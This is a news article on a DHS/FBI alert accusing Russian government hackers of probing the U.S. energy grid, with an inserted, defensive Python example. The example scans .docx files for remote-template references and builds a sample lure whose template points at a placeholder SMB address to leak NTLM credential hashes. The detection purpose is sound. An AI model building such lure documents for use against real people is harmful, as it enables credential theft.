The Trump administration on Thursday accused Russian government hackers of carrying out a deliberate, ongoing operation to penetrate vital U.S. industries, including the energy grid — a major ratcheting up of tensions between the two countries over cybersecurity.
The administration's alert says the hackers penetrated targeted companies to a surprising degree, including copying information that could be used to gain access to the computer systems that control power plants. It's the kind of access that experts say would have given Moscow the ability to turn off the power if it wanted to.
The alert came eight months after leaked documents revealed that federal authorities had found evidence of foreign hackers breaching computer networks in U.S. power companies, including the operator of the Wolf Creek nuclear plant in Kansas.
“Since at least March 2016, Russian government cyber actors … targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors,” according to Thursday’s joint alert, issued by the Homeland Security Department and the FBI.
While the reveal isn’t a surprise to cyber watchers — researchers have been noting such digital espionage for years — it’s rare for the U.S. government to be so blunt about a foreign adversary’s cyber spying. Because the U.S. conducts its own similar online espionage campaigns around the world, intelligence officials have traditionally been loath to openly point fingers at other governments for doing the same thing.
After the alert, Energy Secretary Rick Perry warned members of a House Appropriations subcommittee Thursday that he’s “not confident” the federal government has an adequate strategy in place to address the “hundreds of thousands” of cybersecurity attacks directed at the U.S. every day.
Sen. Maria Cantwell of Washington state, the top Democrat on the Energy and Natural Resources Committee, said Thursday’s alert followed a long series of unanswered warnings about the danger that hackers could trigger economically devastating blackouts.
“A year ago yesterday, I called for a Russian cyber threat assessment to our grid,” Cantwell said in a statement. “I’ve repeatedly asked President [Donald] Trump to tackle this urgent task and have been met with deafening silence. I hope today’s belated response is the first step in a robust and aggressive strategy to protect our critical infrastructure.”
The alert comes on the same day the Trump administration issued new sanctions against Russia for a range of activities, including its actions in cyberspace. Taken together, the steps amount to perhaps the most direct confrontation of Russian hackers by the U.S. government yet.
Russia has been widely accused of launching increasingly dangerous attacks on power grids around the world. Moscow’s most frequent target has been Ukraine, according to researchers. In recent years, Ukraine has twice blamed its neighbor for shutting down portions of its power grid using digital weapons that hackers had not previously successfully deployed on that scale.
The alert says Russian hackers sought access to the American grid and other industries primarily to spy and collect information. Their tools included booby-trapped Word documents, posing as items such as engineers' résumés, attached to legitimate-seeming emails; when opened, a document quietly caused the victim's computer to hand over the user's Windows login credentials (password hashes) to a server the attackers controlled.
The hackers used these lures first against vendors and other companies on the periphery of their main targets (the alert calls them staging targets), then used the stolen credentials and those firms' trusted connections to leapfrog into the higher-value networks of their intended targets and install malware.
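A check a defender would want after reading the description above, as an added example (not code from the alert, from Symantec or from this article): the résumé-style documents in this campaign did not need a macro payload. They referenced a template on an attacker-controlled server, and Word's attempt to fetch that template over SMB when the file was opened sent the user's NTLM credential hash to the attackers; that is the mechanism the DHS/FBI alert (TA18-074A) describes. Because a .docx is a zip archive, the reference lives in a .rels part as a Relationship with TargetMode="External", which is easy to scan for at a mail gateway or during triage. The script below constructs two sample documents in memory (a clean one and a lure whose template points at a documentation-range IP) and scans both; the address, share name and severity scale are assumptions of the example.

```python
"""Scan Office Open XML files (.docx/.dotm) for relationships that point
outside the document, the mechanism behind remote-template lures.

Added example, not code from the DHS/FBI alert or from the article.
The sample documents are constructed in memory; 203.0.113.10 is a
documentation (TEST-NET-3) address, not a real attacker host.
"""
import io
import re
import xml.etree.ElementTree as ET
import zipfile

RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL_BASE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"

# Targets that make Windows open an SMB (or WebDAV) connection, and send an
# NTLM authentication attempt, as soon as Word resolves the reference.
AUTO_CONNECT = re.compile(r"^(\\\\|//|file:)", re.IGNORECASE)


def rate(rel_type: str, target: str) -> str:
    """Severity of one external relationship (scale is this example's own).

    hyperlink: only resolved when the user clicks it.
    attachedTemplate: fetched on open with no prompt, whatever the scheme.
    anything else with a UNC/file target: resolved on open, leaks NTLM hash.
    """
    if rel_type == "hyperlink":
        return "low"
    if rel_type == "attachedTemplate" or AUTO_CONNECT.match(target):
        return "high"
    return "medium"


def scan_docx(data: bytes) -> list:
    """Return every relationship with TargetMode="External" in any .rels part."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for part in z.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(part))
            for rel in root.iter(RELS_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": part,
                    "type": rel_type,
                    "target": target,
                    "severity": rate(rel_type, target),
                })
    return findings


def build_docx(template_target: str = None) -> bytes:
    """Construct a minimal .docx; optionally attach a remote template (constructed sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("_rels/.rels",
                   '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
                   '<Relationship Id="rId1" Type="%sofficeDocument" Target="word/document.xml"/>'
                   '</Relationships>' % REL_BASE)
        z.writestr("word/document.xml",
                   '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
                   '<w:body><w:p><w:r><w:t>Resume - Control Systems Engineer</w:t></w:r></w:p></w:body>'
                   '</w:document>')
        settings = ('<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
                    'xmlns:r="%s">' % REL_BASE[:-1])
        rels = '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        if template_target:
            settings += '<w:attachedTemplate r:id="rId1"/>'
            rels += ('<Relationship Id="rId1" Type="%sattachedTemplate" '
                     'TargetMode="External" Target="%s"/>' % (REL_BASE, template_target))
        z.writestr("word/settings.xml", settings + "</w:settings>")
        z.writestr("word/_rels/settings.xml.rels", rels + "</Relationships>")
    return buf.getvalue()


BENIGN = build_docx()                                        # no external references
LURE = build_docx(r"\\203.0.113.10\share\Normal.dotm")      # template fetched over SMB on open

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("lure", LURE)):
        print(label, scan_docx(doc) or "clean")
```

The same scan applies to .xlsx and .pptx parts, since all three use the same relationship packaging. In a sandbox, the complementary signal is an outbound SMB (TCP 445) or WebDAV connection from WINWORD.EXE toward the internet within seconds of the document opening.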
Once inside, the hackers would move around and conduct reconnaissance, and appeared interested in industrial control systems that manage processes for critical infrastructure, the alert reads.
“The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity,” the alert says.
It says the hackers also used other means to find their way in. In one case, they “downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.”
They also implanted malware in the websites of trade publications and other websites related to the targeted industries, the alert says.
According to Jon Wellinghoff, a former chairman of the Federal Energy Regulatory Commission who now runs his own energy policy consultancy, the hackers seemed to be gathering intelligence “that could provide them with information in the future to do something if they wanted to.”
Essentially, they were setting the stage to potentially turn off the power, cyber experts said.
The details closely dovetail with research published in October by cyber firm Symantec. The government alert even confirmed that the Symantec report — which didn’t attribute the cyber activity to any government — offered “additional information” about Russia’s digital efforts.
The Symantec report reveals that the cyberattacks described in Thursday’s alert stretch back much further than 2016. According to Symantec, the hacking group, which it dubbed Dragonfly, started around 2011, targeting western energy-sector companies, including in the U.S., Turkey and Switzerland.
Though the group was dormant through much of 2014 and 2015, it restarted its digital probing in late 2015 with a campaign that sent fake New Year’s Eve party invites to energy-sector targets, Symantec said.
By 2017, the group had ramped up these malicious efforts, according to the research.
Kevin McIntyre, chairman of the Federal Energy Regulatory Commission — which oversees the energy sector — said the information contained in the alerts showed the need to remain vigilant on cybersecurity.
“Frankly, some of it is a little bit scary,” he told reporters on Thursday. “But we keep our eye on the ball and focus on it so that we try our best as an agency.”
Perry, meanwhile, expressed misgivings about federal cybersecurity efforts.
“I’m not confident that the federal government has a broad strategy in place that is not duplicating, or is least duplicative as it can be,” Perry said after House Energy and Water Appropriations Subcommittee Chairman Mike Simpson (R-Idaho) called cybersecurity attacks “our biggest threat.”
“I’m as worried about cybersecurity as I am nuclear,” Simpson said. “I think we’re attacking it department-wide, but I’m not sure we’re attacking it government-wide.”